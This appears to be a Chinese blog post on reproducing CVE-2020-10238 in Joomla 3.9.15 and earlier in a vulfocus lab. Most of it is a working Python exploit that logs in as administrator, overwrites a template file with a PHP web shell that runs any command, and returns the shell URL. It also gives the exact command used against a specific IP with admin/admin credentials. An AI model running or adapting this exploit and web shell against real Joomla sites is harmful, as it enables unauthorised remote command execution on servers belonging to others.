影响版本

<= 3.9.15

实验环境:

vulfocus一键启动docker环境

poc

#!/usr/bin/python
import sys
import requests
import re
import argparse

def extract_token(resp):
	match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
	if match is None:
		print("[-] Cannot find CSRF token!\n") + "[-] You are not admin account!"
		return None
	return match.group(1)
def try_admin_login(sess,url,uname,upass):
	admin_url = url+'/administrator/index.php'
	print('[+] Getting token for admin login')
	resp = sess.get(admin_url, verify=True)
	token = extract_token(resp)
	# print token
	if not token:
		return False
	print('[+] Logging in to admin')
	data = {
		'username': uname,
		'passwd': upass,
		'task': 'login',
		token: '1'
	}
	resp = sess.post(admin_url, data=data, verify=True)
	if 'task=profile.edit' not in resp.text:
		print('[!] Admin Login Failure!')
		return None
	print('[+] Admin Login Successfully!')
	return True

def rce(sess,url,cmd):
    getjs = url + '/administrator/index.php?option=com_templates&view=template&id=506&file=L2Vycm9yLnBocA%3D%3D'
    resp = sess.get(getjs, verify=True)
    token = extract_token(resp)
    if (token==None) : sys.exit()
    filename='error.php'
    shlink = url + '/administrator/index.php?option=com_templates&view=template&id=506&file=506&file=L2Vycm9yLnBocA%3D%3D'
    shdata_up = {
        'jform[source]': "<?php echo 'Hacked by HK\n' ;system($_GET['cmd']); ?>",
        'task': 'template.apply',
        token: '1',
        'jform[extension_id]': '506',
        'jform[filename]': '/' + filename
    }
    shreq = sess.post(shlink, data=shdata_up)
    path2shell = '/templates/protostar/error.php?cmd='+cmd
    # print '[+] Shell is ready to use: ' + str(path2shell)
    print '[+] Checking:'
    shreq = sess.get(url + path2shell)
    shresp = shreq.text
    print shresp + '[+] Shell link: \n' + (url + path2shell)
    print '[+] Module finished.'

def main() :
	
	# Construct the argument parser
	ap = argparse.ArgumentParser()
	# Add the arguments to the parser
	ap.add_argument("-url", "--url", required=True,
					help=" URL for your Joomla target")
	ap.add_argument("-u", "--username", required=True,
					help="username")
	ap.add_argument("-p", "--password", required=True,
					help="password")
	ap.add_argument("-cmd", "--command", default="whoami",
					help="command")
	args = vars(ap.parse_args())
	# target
	url = format(str(args['url']))
	print '[+] Your target: ' + url
	# username
	uname = format(str(args['username']))
	# password
	upass = format(str(args['password']))
	# command
	command = format(str(args['command']))
	
	sess = requests.Session()
	if(try_admin_login(sess,url,uname,upass) == None) : sys.exit()
	rce(sess,url,command)
if __name__ == "__main__":
	sys.exit(main())

执行命令

python CVE-2020-10238.py -url http://188.40.189.135:62434 -u admin -p admin

返回webshell信息

http://188.40.189.135:62434/templates/protostar/error.php?cmd=whoami

大概就这些……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...